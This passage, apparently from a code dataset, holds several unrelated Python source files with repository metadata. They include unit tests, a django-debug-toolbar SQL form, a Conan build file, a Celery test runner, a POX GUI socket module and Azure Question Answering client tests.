self.assertIn('localhost', self.driver.hosts)
def test_driver_links(self):
self.assertEqual(len(self.driver.links), 2)
for driver in self.driver.links:
self.assertIn(driver.rel, ['self', 'bookmark'])
if driver.rel == 'bookmark':
self.assertEqual(
driver.href,
'http://192.168.159.128:6385/drivers/fake')
else:
self.assertEqual(
driver.href,
'http://192.168.159.128:6385/v1/drivers/fake')
| 33.723849
| 79
| 0.359553
|
4a04eb9ca1a884fccbff255822fd042d715eccdd
| 396
|
py
|
Python
|
tests/test_field.py
|
samarjeet27/CSV-Mapper
|
90946a138b5690623ef1e2ada42b32c9f3e52b16
|
[
"MIT"
] | 18
|
2015-01-21T15:03:21.000Z
|
2017-05-09T10:15:46.000Z
|
tests/test_field.py
|
samarsault/CSV-Mapper
|
90946a138b5690623ef1e2ada42b32c9f3e52b16
|
[
"MIT"
] | 8
|
2015-03-14T14:22:26.000Z
|
2017-06-04T11:45:05.000Z
|
tests/test_field.py
|
samarsault/CSV-Mapper
|
90946a138b5690623ef1e2ada42b32c9f3e52b16
|
[
"MIT"
] | 8
|
2015-01-21T15:03:22.000Z
|
2017-05-18T06:31:21.000Z
|
import unittest
import csvmapper
class FieldTest(unittest.TestCase):
def setUp(self):
parser = csvmapper.CSVParser('tests/data/sampleData.csv', csvmapper.FieldMapper(('name', 'job','country','age')))
self.obj = parser.buildDict()
def test_attr(self):
self.assertEqual(self.obj[0]['name'], 'John')
self.assertEqual(self.obj[1]['age'], '32')
if __name__ == '__main__':
unittest.main()
| 28.285714
| 115
| 0.709596
|
4a04ecc0ea5491e30189c25e7bc6d7bea4cb874b
| 41
|
py
|
Python
|
tests/__init__.py
|
swallat/safe_reboot
|
f950deb429f38e0e80d8f884afc06f2d7201e023
|
[
"Apache-2.0"
] | null | null | null |
tests/__init__.py
|
swallat/safe_reboot
|
f950deb429f38e0e80d8f884afc06f2d7201e023
|
[
"Apache-2.0"
] | null | null | null |
tests/__init__.py
|
swallat/safe_reboot
|
f950deb429f38e0e80d8f884afc06f2d7201e023
|
[
"Apache-2.0"
] | null | null | null |
"""Unit test package for safe_reboot."""
| 20.5
| 40
| 0.707317
|
4a04ee2c1a8b91e1f93c84c850d971f3b870dc19
| 74
|
py
|
Python
|
main.py
|
FranckEnriquez/pythonProject
|
28e7612ed19e5a9a124a7cfefadf6b8db5e84d12
|
[
"MIT"
] | null | null | null |
main.py
|
FranckEnriquez/pythonProject
|
28e7612ed19e5a9a124a7cfefadf6b8db5e84d12
|
[
"MIT"
] | null | null | null |
main.py
|
FranckEnriquez/pythonProject
|
28e7612ed19e5a9a124a7cfefadf6b8db5e84d12
|
[
"MIT"
] | null | null | null |
'''
main.py: gather the principals components of each project section.
'''
| 24.666667
| 66
| 0.743243
|
4a04ee67b3640917360632de75e33771c4b16186
| 2,664
|
py
|
Python
|
djangox/lib/python3.8/site-packages/debug_toolbar/panels/sql/forms.py
|
DemarcusL/django_wiki_lab
|
3b7cf18af7e0f89c94d10eb953ca018a150a2f55
|
[
"MIT"
] | 1
|
2020-10-19T12:35:10.000Z
|
2020-10-19T12:35:10.000Z
|
djangox/lib/python3.8/site-packages/debug_toolbar/panels/sql/forms.py
|
DemarcusL/django_wiki_lab
|
3b7cf18af7e0f89c94d10eb953ca018a150a2f55
|
[
"MIT"
] | 6
|
2021-04-08T20:09:57.000Z
|
2022-03-12T00:49:24.000Z
|
djangox/lib/python3.8/site-packages/debug_toolbar/panels/sql/forms.py
|
DemarcusL/django_wiki_lab
|
3b7cf18af7e0f89c94d10eb953ca018a150a2f55
|
[
"MIT"
] | 3
|
2020-10-07T20:19:52.000Z
|
2020-11-09T14:42:55.000Z
|
import hashlib
import hmac
import json
from django import forms
from django.conf import settings
from django.core.exceptions import ValidationError
from django.db import connections
from django.utils.crypto import constant_time_compare
from django.utils.encoding import force_bytes
from django.utils.functional import cached_property
from debug_toolbar.panels.sql.utils import reformat_sql
class SQLSelectForm(forms.Form):
"""
Validate params
sql: The sql statement with interpolated params
raw_sql: The sql statement with placeholders
params: JSON encoded parameter values
duration: time for SQL to execute passed in from toolbar just for redisplay
hash: the hash of (secret + sql + params) for tamper checking
"""
sql = forms.CharField()
raw_sql = forms.CharField()
params = forms.CharField()
alias = forms.CharField(required=False, initial="default")
duration = forms.FloatField()
hash = forms.CharField()
def __init__(self, *args, **kwargs):
initial = kwargs.get("initial")
if initial is not None:
initial["hash"] = self.make_hash(initial)
super().__init__(*args, **kwargs)
for name in self.fields:
self.fields[name].widget = forms.HiddenInput()
def clean_raw_sql(self):
value = self.cleaned_data["raw_sql"]
if not value.lower().strip().startswith("select"):
raise ValidationError("Only 'select' queries are allowed.")
return value
def clean_params(self):
value = self.cleaned_data["params"]
try:
return json.loads(value)
except ValueError:
raise ValidationError("Is not valid JSON")
def clean_alias(self):
value = self.cleaned_data["alias"]
if value not in connections:
raise ValidationError("Database alias '%s' not found" % value)
return value
def clean_hash(self):
hash = self.cleaned_data["hash"]
if not constant_time_compare(hash, self.make_hash(self.data)):
raise ValidationError("Tamper alert")
return hash
def reformat_sql(self):
return reformat_sql(self.cleaned_data["sql"], with_toggle=False)
def make_hash(self, data):
m = hmac.new(key=force_bytes(settings.SECRET_KEY), digestmod=hashlib.sha1)
for item in [data["sql"], data["params"]]:
m.update(force_bytes(item))
return m.hexdigest()
@property
def connection(self):
return connections[self.cleaned_data["alias"]]
@cached_property
def cursor(self):
return self.connection.cursor()
| 28.956522
| 83
| 0.664039
|
4a04ef8585e59a3d321deebceffd825ab1bbe049
| 547
|
py
|
Python
|
pytglib/api/types/chat_action_recording_voice_note.py
|
iTeam-co/pytglib
|
e5e75e0a85f89b77762209b32a61b0a883c0ae61
|
[
"MIT"
] | 6
|
2019-10-30T08:57:27.000Z
|
2021-02-08T14:17:43.000Z
|
pytglib/api/types/chat_action_recording_voice_note.py
|
iTeam-co/python-telegram
|
e5e75e0a85f89b77762209b32a61b0a883c0ae61
|
[
"MIT"
] | 1
|
2021-08-19T05:44:10.000Z
|
2021-08-19T07:14:56.000Z
|
pytglib/api/types/chat_action_recording_voice_note.py
|
iTeam-co/python-telegram
|
e5e75e0a85f89b77762209b32a61b0a883c0ae61
|
[
"MIT"
] | 5
|
2019-12-04T05:30:39.000Z
|
2021-05-21T18:23:32.000Z
|
from ..utils import Object
class ChatActionRecordingVoiceNote(Object):
"""
The user is recording a voice note
Attributes:
ID (:obj:`str`): ``ChatActionRecordingVoiceNote``
No parameters required.
Returns:
ChatAction
Raises:
:class:`telegram.Error`
"""
ID = "chatActionRecordingVoiceNote"
def __init__(self, **kwargs):
pass
@staticmethod
def read(q: dict, *args) -> "ChatActionRecordingVoiceNote":
return ChatActionRecordingVoiceNote()
| 17.645161
| 63
| 0.621572
|
4a04ef9acaeeb7374c8d9e94079ecf6bcd1ed82a
| 342
|
py
|
Python
|
conanfile.py
|
CloudComputer/libInterpolate
|
75adc603364d19919909a89cfbfd02a1cc502bdb
|
[
"MIT"
] | 1
|
2020-07-17T09:41:17.000Z
|
2020-07-17T09:41:17.000Z
|
conanfile.py
|
CloudComputer/libInterpolate
|
75adc603364d19919909a89cfbfd02a1cc502bdb
|
[
"MIT"
] | null | null | null |
conanfile.py
|
CloudComputer/libInterpolate
|
75adc603364d19919909a89cfbfd02a1cc502bdb
|
[
"MIT"
] | null | null | null |
from conans import ConanFile, CMake, tools
import os
class ConanBuild(ConanFile):
generators = "cmake", "virtualenv"
requires = 'boost/1.69.0@conan/stable', 'eigen/3.3.7@cd3/devel'
build_requires = 'cmake_installer/3.13.0@conan/stable'
def build(self):
cmake = CMake(self)
cmake.configure()
cmake.build()
| 24.428571
| 67
| 0.672515
|
4a04eff2ee2ce87d4181521b1d202b197c7c3a3a
| 556
|
py
|
Python
|
celery/contrib/test_runner.py
|
winhamwr/celery
|
249a270301ddb9b025cf8d00400bb442df9cae62
|
[
"BSD-3-Clause"
] | 1
|
2017-12-26T06:29:37.000Z
|
2017-12-26T06:29:37.000Z
|
celery/contrib/test_runner.py
|
winhamwr/celery
|
249a270301ddb9b025cf8d00400bb442df9cae62
|
[
"BSD-3-Clause"
] | null | null | null |
celery/contrib/test_runner.py
|
winhamwr/celery
|
249a270301ddb9b025cf8d00400bb442df9cae62
|
[
"BSD-3-Clause"
] | null | null | null |
from django.conf import settings
from django.test.simple import run_tests as run_tests_orig
USAGE = """\
Custom test runner to allow testing of celery delayed tasks.
"""
def run_tests(test_labels, *args, **kwargs):
"""Django test runner allowing testing of celery delayed tasks.
All tasks are run locally, not in a worker.
To use this runner set ``settings.TEST_RUNNER``::
TEST_RUNNER = "celery.contrib.test_runner.run_tests"
"""
settings.CELERY_ALWAYS_EAGER = True
return run_tests_orig(test_labels, *args, **kwargs)
| 27.8
| 67
| 0.726619
|
4a04f005c7d5f65452467a1f08104f5cebb9f8df
| 1,763
|
py
|
Python
|
tests/smartdatamodels/poi/test_poi.py
|
Orange-OpenSource/python-ngsild-client
|
23ff31506aabd23c75befece1fb3d4536903cb2a
|
[
"Apache-2.0"
] | 7
|
2022-02-25T09:55:28.000Z
|
2022-03-25T20:48:01.000Z
|
tests/smartdatamodels/poi/test_poi.py
|
Orange-OpenSource/python-ngsild-client
|
23ff31506aabd23c75befece1fb3d4536903cb2a
|
[
"Apache-2.0"
] | null | null | null |
tests/smartdatamodels/poi/test_poi.py
|
Orange-OpenSource/python-ngsild-client
|
23ff31506aabd23c75befece1fb3d4536903cb2a
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# Software Name: ngsildclient
# SPDX-FileCopyrightText: Copyright (c) 2021 Orange
# SPDX-License-Identifier: Apache 2.0
#
# This software is distributed under the Apache 2.0;
# see the NOTICE file for more details.
#
# Author: Fabien BATTELLO <fabien.battello@orange.com> et al.
import pkg_resources
import json
from ngsildclient.model.entity import *
from ngsildclient.model.helper.postal import PostalAddressBuilder
def expected_dict(basename: str) -> dict:
filename: str = pkg_resources.resource_filename(__name__, f"data/{basename}.json")
with open(filename, "r") as fp:
expected = json.load(fp)
return expected
def test_poi():
"""
https://smart-data-models.github.io/dataModel.PointOfInterest/PointOfInterest/examples/example-normalized.jsonld
"""
e = Entity(
"PointOfInterest",
"PointOfInterest:PointOfInterest-A-Concha-123456",
ctx=[
"https://smartdatamodels.org/context.jsonld",
"https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld",
],
)
e.prop("name", "Playa de a Concha")
builder = PostalAddressBuilder()
address = builder.country("ES").locality("Vilagarcía de Arousa").build()
e.prop("address", address)
e.prop("category", [113])
e.prop(
"description",
"La Playa de A Concha se presenta como una continuación de la Playa de Compostela, una de las más frecuentadas de Vilagarcía.",
)
e.gprop("location", (42.60214472222222, -8.768460000000001))
e.prop("refSeeAlso", "urn:ngsi-ld:SeeAlso:Beach-A-Concha-123456")
e.prop("source", "http://www.tourspain.es")
assert e.to_dict() == expected_dict("poi")
assert e.to_dict(kv=True) == expected_dict("poi.kv")
| 32.054545
| 135
| 0.684061
|
4a04f2a90dd211dd0550fe3f62ffc632ce9e78e5
| 6,464
|
py
|
Python
|
Internetworking Distributed Project/finalProject/ovs/pox-master/tools/gui/communication.py
|
supriyasingh01/github_basics
|
8aa93f783cfe347368763ef31be5ab59fe8476a1
|
[
"CC0-1.0"
] | null | null | null |
Internetworking Distributed Project/finalProject/ovs/pox-master/tools/gui/communication.py
|
supriyasingh01/github_basics
|
8aa93f783cfe347368763ef31be5ab59fe8476a1
|
[
"CC0-1.0"
] | null | null | null |
Internetworking Distributed Project/finalProject/ovs/pox-master/tools/gui/communication.py
|
supriyasingh01/github_basics
|
8aa93f783cfe347368763ef31be5ab59fe8476a1
|
[
"CC0-1.0"
] | null | null | null |
'''
This module implements the communication between
- the topology view and the monitoring backend that feeds it
- the log view and NOX's logger
- the json command prompt and NOX's json messenger
@author Kyriakos Zarifis
'''
from PyQt4 import QtGui, QtCore
import SocketServer
import socket
import logging
import json
import asyncore
from time import sleep
import cPickle
import struct
# JSON decoder used by default
defaultDecoder = json.JSONDecoder()
class Communication(QtCore.QThread, QtGui.QWidget):
'''
Communicates with backend in order to receive topology-view
information. Used to communicate with GuiMessenger for other, component-
specific event notification too.
'''
# Define signals that are emitted when messages are received
# Interested custom views connect these signals to their slots
# Signal used to notify te view that tunnels have been updated
#tunnels_reply_received_signal = QtCore.pyqtSignal()
# Signal used to notify te view that new TED info was received
#ted_reply_received_signal = QtCore.pyqtSignal()
# Signal used to notify te view that tunnels might have changed
#link_status_change_signal = QtCore.pyqtSignal()
# Define a new signal that takes a SwitchQueryReply type as an argument
#switch_query_reply_received_signal = QtCore.pyqtSignal()# SwitchQueryReply )
# Signal used to notify monitoring view of new msg
monitoring_received_signal = QtCore.pyqtSignal(object)
# Define a new signal that takes a Topology type as an argument
topology_received_signal = QtCore.pyqtSignal(object)
# Signal used to notify STP view of new msg
spanning_tree_received_signal = QtCore.pyqtSignal(object)
# Signal used to notify routing view of new msg
routing_received_signal = QtCore.pyqtSignal(object)
# Signal used to notify FlowTracer view of new msg
flowtracer_received_signal = QtCore.pyqtSignal(object)
# Signal used to notify Log of new msg
log_received_signal = QtCore.pyqtSignal(object)
def __init__(self, parent):
QtCore.QThread.__init__(self)
self.xid_counter = 1
self.parent = parent
self.backend_ip = self.parent.backend_ip
self.backend_port = self.parent.backend_port
# Connect socket
self.connected = False
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#self.sock.setblocking(0)
try:
self.sock.connect((self.backend_ip,self.backend_port))
self.connected = True
except:
self.retry_connection()
#self.subscribe_for_topochanges()
#self.subscribe_for_linkutils()
self.listener = Listener(self)
self.listener.start()
def retry_connection(self):
print "Retrying connection to POX...(is 'messenger' running?)"
sleep(2)
try:
self.sock.connect((self.backend_ip,self.backend_port))
self.connected = True
except:
self.retry_connection()
def send(self, msg):
if not self.connected:
print "Not connected to POX"
return
#if not "xid" in msg:
# msg["xid"] = self.xid_counter
#self.xid_counter += 1
print 'Sending :', msg
self.sock.send(json.dumps(msg))
def shutdown(self):
#self.listener.stop()
self.sock.shutdown(1)
self.sock.close()
class Listener(QtCore.QThread):
def __init__(self, p):
QtCore.QThread.__init__(self)
self.p = p
self._buf = bytes()
def run (self):
while 1:
data = self.p.sock.recv(1024)
if data is None or len(data) == 0:
break
#if len(data) == 0: return
if len(self._buf) == 0:
if data[0].isspace():
self._buf = data.lstrip()
else:
self._buf = data
else:
self._buf += data
while len(self._buf) > 0:
try:
msg, l = defaultDecoder.raw_decode(self._buf)
except:
# Need more data before it's a valid message
# (.. or the stream is corrupt and things will never be okay ever again)
return
self._buf = self._buf[l:]
if len(self._buf) != 0 and self._buf[0].isspace():
self._buf = self._buf.lstrip()
if msg["type"] == "topology":
print "Recieved :", msg
self.p.topology_received_signal.emit(msg)
elif msg["type"] == "monitoring":
self.p.monitoring_received_signal.emit(msg)
elif msg["type"] == "spanning_tree":
self.p.spanning_tree_received_signal.emit(msg)
elif msg["type"] == "sample_routing":
self.p.routing_received_signal.emit(msg)
elif msg["type"] == "flowtracer":
self.p.flowtracer_received_signal.emit(msg)
elif msg["type"] == "log":
self.p.log_received_signal.emit(msg)
class ConsoleInterface():
'''
Sends JSON commands to NOX
'''
def __init__(self, parent):
self.consoleWidget = parent
##NOX host
self.nox_host = "localhost"
##Port number
self.port_no = 2703
def send_cmd(self, cmd=None, expectReply=False):
# if textbox empty, construct command
if not cmd:
print "sending dummy cmd"
cmd = "{\"type\":\"lavi\",\"command\":\"request\",\"node_type\":\"all\"}"
#Send command
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.nox_host,self.port_no))
sock.send(cmd)
if expectReply:
print json.dumps(json.loads(sock.recv(4096)), indent=4)
sock.send("{\"type\":\"disconnect\"}")
sock.shutdown(1)
sock.close()
| 35.322404
| 93
| 0.568843
|
4a04f2ac56134703f643a6aeb3cdc6bc815685d3
| 19,348
|
py
|
Python
|
sdk/cognitivelanguage/azure-ai-language-questionanswering/tests/test_query_text_async.py
|
bpkroth/azure-sdk-for-python
|
a269888e708c10d955b91b4ab421a81a8ccfda5b
|
[
"MIT"
] | null | null | null |
sdk/cognitivelanguage/azure-ai-language-questionanswering/tests/test_query_text_async.py
|
bpkroth/azure-sdk-for-python
|
a269888e708c10d955b91b4ab421a81a8ccfda5b
|
[
"MIT"
] | null | null | null |
sdk/cognitivelanguage/azure-ai-language-questionanswering/tests/test_query_text_async.py
|
bpkroth/azure-sdk-for-python
|
a269888e708c10d955b91b4ab421a81a8ccfda5b
|
[
"MIT"
] | null | null | null |
# coding=utf-8
# ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
from azure.core.exceptions import HttpResponseError, ClientAuthenticationError
from azure.core.credentials import AzureKeyCredential
from testcase import (
QuestionAnsweringTest,
GlobalQuestionAnsweringAccountPreparer
)
from azure.ai.language.questionanswering.aio import QuestionAnsweringClient
from azure.ai.language.questionanswering.rest import *
from azure.ai.language.questionanswering.models import (
TextQueryParameters,
TextInput
)
class QnATests(QuestionAnsweringTest):
def setUp(self):
super(QnATests, self).setUp()
@GlobalQuestionAnsweringAccountPreparer()
async def test_query_text_llc(self, qna_account, qna_key):
client = QuestionAnsweringClient(qna_account, AzureKeyCredential(qna_key))
json_content = {
"question": "What is the meaning of life?",
"records": [
{
"text": "abc Graphics Surprise, surprise -- our 4K ",
"id": "doc1"
},
{
"text": "e graphics card. While the Nvidia GeForce MX250 GPU isn't meant for demanding gaming, it is a step up from integrated graphics as proven by comparing it to the UHD 620 GPU in the FHD model. The MX250-equipped Envy 13 scored a 116,575 on the Ice Storm Unlimited benchmark while the base model scored a 82,270. Upgrading to the discrete graphics gives the Envy 13 better performance than the Notebook 9 Pro (61,662; UHD 620), Surface Laptop 2 (71,647; UHD 620) and the premium laptop average (86,937). While the Nvidia GeForce MX250 GPU isn't meant for demanding gaming, it is a step up from integrated graphics as proven by comparing it to the UHD 620 GPU in the FHD model. We played the racing game Dirt 3 at 92 frames per second on ",
"id": "doc2"
},
{
"text": "Graphics Surprise, surprise -- our 4K Envy 13 came with a discrete graphics card. While the Nvidia GeForce MX250 GPU isn't meant for demanding gaming, it is a step up from integrated graphics as proven by comparing it to the UHD 620 GPU in the FHD model. The MX250-equipped Envy 13 scored a 116,575 on the Ice Storm Unlimited benchmark while the base model scored a 82,270. Upgrading to the discrete graphics gives the Envy 13 better performance than the Notebook 9 Pro (61,662; UHD 620), Surface Laptop 2 (71,647; UHD 620) and the premium laptop average (86,937). While the Nvidia GeForce MX250 GPU isn't meant for demanding gaming, it is a step up from integrated graphics as proven by comparing it to the UHD 620 GPU in the FHD model. We played the racing game Dirt 3 at 92 frames per second on the MX250 model, which is well above our 30-fps playability, the category average (69 fps) and what the Surface Laptop 2 (82 fps) achieved. The ZenBook S UX391UA (45 fps) fell flat on this real-world test but ran better than the base model Envy 13 (31 fps). Audio I had a good ol' time groovin' to the sound of the Envy 13's crisp speakers. HP went all out with the Envy, placing dual speakers on the underside of the chassis along with a third, top-firing driver above the keyboard. Devon Gilfillian's funky jam \"Here and Now\" boomed smooth, soulful tunes throughout my small apartment. The twang of the electric guitar played nicely with the thudding percussion but never overshadowed Gilfillian or the female backup vocals. Bang & Olufsen software comes preinstalled on the Envy 13, with equalizer controls so you can adjust the bass, midrange and treble to your liking. But even out of the box, you'll enjoy great sound without having to bust out your headphones. Battery Life Get an Envy 13 with the 1080p non-touch display if battery life is important to you. The FHD model endured for 11 hours and 11 minutes whereas the 4K model lasted only 4 hours and 36 minutes on our battery test, which involves continuous web browsing over Wi-Fi at 150 nits of brightness. MORE: Laptops with Best Battery Life - Longest Lasting Laptop Batteries Competing laptops like the ZenBook S UX391UA (7:05), Surface Laptop 2 (9:22) and Notebook 9 Pro (8:53) outstayed the 4K Envy 13 but powered down long before the 1080p version. Webcam The 720p webcam on the Envy 13 is nothing to write home about. A selfie I snapped in my dimly lit room was covered in a haze of visual noise. My beard and hair were unkempt blobs, while my eyes looked like they were drawn on by a pointillist painter. If there's one positive, it's that the lens captures natural colors and even extracted the different shades of gray in my T-shirt. On the right edge of the Envy 13 is a physical kill switch that cuts the power to the webcam so you can feel reassured that nobody is snooping on you. Heat Leave the lapdesk at home - you don't have to worry about the Envy 13 overheating. After I played a 15-minute, full-HD video in full screen, the touchpad on the HP Envy 13 with a Core i7 CPU rose to only 83 degrees Fahrenheit while the keyboard (87 degrees) and underside (90 degrees) also remained well below our 95-degree comfort threshold. Even the toastiest part of the machine, the lower-left edge on the underside, topped out at 94 degrees. Software and Warranty It's a shame that a laptop with such beautiful hardware ships with such ugly software. Pre-installed on this machine are entirely too many programs that could either be packaged together or omitted altogether. HP provides an app called Audio Switch, which simply lets you switch your audio input/output between the internal speakers and headphones. As the same implies, HP's Command Center is where you can get information about your Envy 13 but also switch the thermal profiles between comfort and performance. Along with support documentation, HP also bundles in a setup program called JumpStart, a program for connecting printers and a redundant system-info app called Event Utility. Also installed on the Envy 13's Windows 10 Home OS are several Microsoft apps, including Simple Solitaire, Candy Crush Friends and Your Phone. Other third-party apps include Booking.com, Netflix and McAfee Security. HP ships the Envy 13 with a one-year warranty. See how HP did on our Tech Support Showdown and Best and Worst Brands ranking. Bottom Line The Envy 13 has cemented its standing as the ultimate laptop for college students or travelers. Along with 11-plus hours of battery life (on the FHD model), the Envy 13 has a sleek, ultraportable chassis, fast performance, and powerful speakers. Best of all, the Envy 13 starts at a reasonable $799, which is hundreds less than the competition. In many ways, the Envy 13 is what we wanted the new MacBook Air to be. The new HP Envy 13 is everything I was hoping the new MacBook Air would be: fast, attractive and affordable. Just be sure to buy the right model. We strongly recommend the 1080p version over the 4K model because it lasts several hours longer on a charge and costs less. In fact, if we were reviewing the 4K model separately, we'd only give it a 3.5 rating. You should also consider the Envy 13 with a 10th Gen CPU, although we haven't gotten the chance to review it yet. If you absolutely need a high-res display, the 4K Envy 13 is one of many good options. We also recommend the Samsung Notebook 9 Pro, which has a similarly premium design but much better battery life than the 4K Envy. The Microsoft Surface Laptop 2 is another recommended alternative, though you might want to wait a few months for the rumored Surface Laptop 3. Overall, the HP Envy 13 is a fantastic laptop that checks all the right boxes --- as long as you buy the 1080p model. Credit: Laptop Mag HP Envy 13 (2019) Specs BluetoothBluetooth 5.0 BrandHP CPUIntel Core i7-8565U Card SlotsmicroSD Company Websitehttps://www8.hp.com/us/en/home.html Display Size13.3 Graphics CardNvidia GeForce MX250 Hard Drive Size512GB Hard Drive TypePCIe NVMe M.2 Highest Available Resolution3840 x 2160 Native Resolution3840 x 2160 Operating SystemWindows 10 Home Ports (excluding USB)USB 3.1 with Type-C, USB 3.1 Always-On, USB 3.1, Headphone/Mic, microSD RAM16GB RAM Upgradable to16GB Size12.1 x 8.3 x .57 inches Touchpad Size4.3 x 2.2 inches USB Ports3 Video Memory2GB Warranty/Supportone-year warranty. Weight2.8 pounds Wi-Fi802.11ac Wi-Fi ModelIntel Wireless-AC 9560 ",
"id": "doc3"
}
],
"language": "en"
}
request = build_query_text_request(
json=json_content
)
response = await client.send_request(request)
assert response.status_code == 200
output = response.json()
assert output.get('answers')
for answer in output['answers']:
assert answer.get('answer')
assert answer.get('confidenceScore')
assert answer.get('id')
assert answer.get('offset')
assert answer.get('length')
assert answer.get('answerSpan')
assert answer['answerSpan'].get('text')
assert answer['answerSpan'].get('confidenceScore')
assert answer['answerSpan'].get('offset') is not None
assert answer['answerSpan'].get('length')
@GlobalQuestionAnsweringAccountPreparer()
async def test_query_text(self, qna_account, qna_key):
client = QuestionAnsweringClient(qna_account, AzureKeyCredential(qna_key))
params = TextQueryParameters(
question="What is the meaning of life?",
records=[
TextInput(
text="abc Graphics Surprise, surprise -- our 4K ",
id="doc1"
),
TextInput(
text="e graphics card. While the Nvidia GeForce MX250 GPU isn't meant for demanding gaming, it is a step up from integrated graphics as proven by comparing it to the UHD 620 GPU in the FHD model. The MX250-equipped Envy 13 scored a 116,575 on the Ice Storm Unlimited benchmark while the base model scored a 82,270. Upgrading to the discrete graphics gives the Envy 13 better performance than the Notebook 9 Pro (61,662; UHD 620), Surface Laptop 2 (71,647; UHD 620) and the premium laptop average (86,937). While the Nvidia GeForce MX250 GPU isn't meant for demanding gaming, it is a step up from integrated graphics as proven by comparing it to the UHD 620 GPU in the FHD model. We played the racing game Dirt 3 at 92 frames per second on ",
id="doc2"
),
TextInput(
text="Graphics Surprise, surprise -- our 4K Envy 13 came with a discrete graphics card. While the Nvidia GeForce MX250 GPU isn't meant for demanding gaming, it is a step up from integrated graphics as proven by comparing it to the UHD 620 GPU in the FHD model. The MX250-equipped Envy 13 scored a 116,575 on the Ice Storm Unlimited benchmark while the base model scored a 82,270. Upgrading to the discrete graphics gives the Envy 13 better performance than the Notebook 9 Pro (61,662; UHD 620), Surface Laptop 2 (71,647; UHD 620) and the premium laptop average (86,937). While the Nvidia GeForce MX250 GPU isn't meant for demanding gaming, it is a step up from integrated graphics as proven by comparing it to the UHD 620 GPU in the FHD model. We played the racing game Dirt 3 at 92 frames per second on the MX250 model, which is well above our 30-fps playability, the category average (69 fps) and what the Surface Laptop 2 (82 fps) achieved. The ZenBook S UX391UA (45 fps) fell flat on this real-world test but ran better than the base model Envy 13 (31 fps). Audio I had a good ol' time groovin' to the sound of the Envy 13's crisp speakers. HP went all out with the Envy, placing dual speakers on the underside of the chassis along with a third, top-firing driver above the keyboard. Devon Gilfillian's funky jam \"Here and Now\" boomed smooth, soulful tunes throughout my small apartment. The twang of the electric guitar played nicely with the thudding percussion but never overshadowed Gilfillian or the female backup vocals. Bang & Olufsen software comes preinstalled on the Envy 13, with equalizer controls so you can adjust the bass, midrange and treble to your liking. But even out of the box, you'll enjoy great sound without having to bust out your headphones. Battery Life Get an Envy 13 with the 1080p non-touch display if battery life is important to you. The FHD model endured for 11 hours and 11 minutes whereas the 4K model lasted only 4 hours and 36 minutes on our battery test, which involves continuous web browsing over Wi-Fi at 150 nits of brightness. MORE: Laptops with Best Battery Life - Longest Lasting Laptop Batteries Competing laptops like the ZenBook S UX391UA (7:05), Surface Laptop 2 (9:22) and Notebook 9 Pro (8:53) outstayed the 4K Envy 13 but powered down long before the 1080p version. Webcam The 720p webcam on the Envy 13 is nothing to write home about. A selfie I snapped in my dimly lit room was covered in a haze of visual noise. My beard and hair were unkempt blobs, while my eyes looked like they were drawn on by a pointillist painter. If there's one positive, it's that the lens captures natural colors and even extracted the different shades of gray in my T-shirt. On the right edge of the Envy 13 is a physical kill switch that cuts the power to the webcam so you can feel reassured that nobody is snooping on you. Heat Leave the lapdesk at home - you don't have to worry about the Envy 13 overheating. After I played a 15-minute, full-HD video in full screen, the touchpad on the HP Envy 13 with a Core i7 CPU rose to only 83 degrees Fahrenheit while the keyboard (87 degrees) and underside (90 degrees) also remained well below our 95-degree comfort threshold. Even the toastiest part of the machine, the lower-left edge on the underside, topped out at 94 degrees. Software and Warranty It's a shame that a laptop with such beautiful hardware ships with such ugly software. Pre-installed on this machine are entirely too many programs that could either be packaged together or omitted altogether. HP provides an app called Audio Switch, which simply lets you switch your audio input/output between the internal speakers and headphones. As the same implies, HP's Command Center is where you can get information about your Envy 13 but also switch the thermal profiles between comfort and performance. Along with support documentation, HP also bundles in a setup program called JumpStart, a program for connecting printers and a redundant system-info app called Event Utility. Also installed on the Envy 13's Windows 10 Home OS are several Microsoft apps, including Simple Solitaire, Candy Crush Friends and Your Phone. Other third-party apps include Booking.com, Netflix and McAfee Security. HP ships the Envy 13 with a one-year warranty. See how HP did on our Tech Support Showdown and Best and Worst Brands ranking. Bottom Line The Envy 13 has cemented its standing as the ultimate laptop for college students or travelers. Along with 11-plus hours of battery life (on the FHD model), the Envy 13 has a sleek, ultraportable chassis, fast performance, and powerful speakers. Best of all, the Envy 13 starts at a reasonable $799, which is hundreds less than the competition. In many ways, the Envy 13 is what we wanted the new MacBook Air to be. The new HP Envy 13 is everything I was hoping the new MacBook Air would be: fast, attractive and affordable. Just be sure to buy the right model. We strongly recommend the 1080p version over the 4K model because it lasts several hours longer on a charge and costs less. In fact, if we were reviewing the 4K model separately, we'd only give it a 3.5 rating. You should also consider the Envy 13 with a 10th Gen CPU, although we haven't gotten the chance to review it yet. If you absolutely need a high-res display, the 4K Envy 13 is one of many good options. We also recommend the Samsung Notebook 9 Pro, which has a similarly premium design but much better battery life than the 4K Envy. The Microsoft Surface Laptop 2 is another recommended alternative, though you might want to wait a few months for the rumored Surface Laptop 3. Overall, the HP Envy 13 is a fantastic laptop that checks all the right boxes --- as long as you buy the 1080p model. Credit: Laptop Mag HP Envy 13 (2019) Specs BluetoothBluetooth 5.0 BrandHP CPUIntel Core i7-8565U Card SlotsmicroSD Company Websitehttps://www8.hp.com/us/en/home.html Display Size13.3 Graphics CardNvidia GeForce MX250 Hard Drive Size512GB Hard Drive TypePCIe NVMe M.2 Highest Available Resolution3840 x 2160 Native Resolution3840 x 2160 Operating SystemWindows 10 Home Ports (excluding USB)USB 3.1 with Type-C, USB 3.1 Always-On, USB 3.1, Headphone/Mic, microSD RAM16GB RAM Upgradable to16GB Size12.1 x 8.3 x .57 inches Touchpad Size4.3 x 2.2 inches USB Ports3 Video Memory2GB Warranty/Supportone-year warranty. Weight2.8 pounds Wi-Fi802.11ac Wi-Fi ModelIntel Wireless-AC 9560 ",
id="doc3"
)
],
language="en"
)
output = await client.query_text(params)
assert output.answers
for answer in output.answers:
assert answer.answer
assert answer.confidence_score
assert answer.id
assert answer.offset
assert answer.length
assert answer.answer_span
assert answer.answer_span.text
assert answer.answer_span.confidence_score
assert answer.answer_span.offset is not None
assert answer.answer_span.length
@GlobalQuestionAnsweringAccountPreparer()
async def test_query_text_with_dictparams(self, qna_account, qna_key):
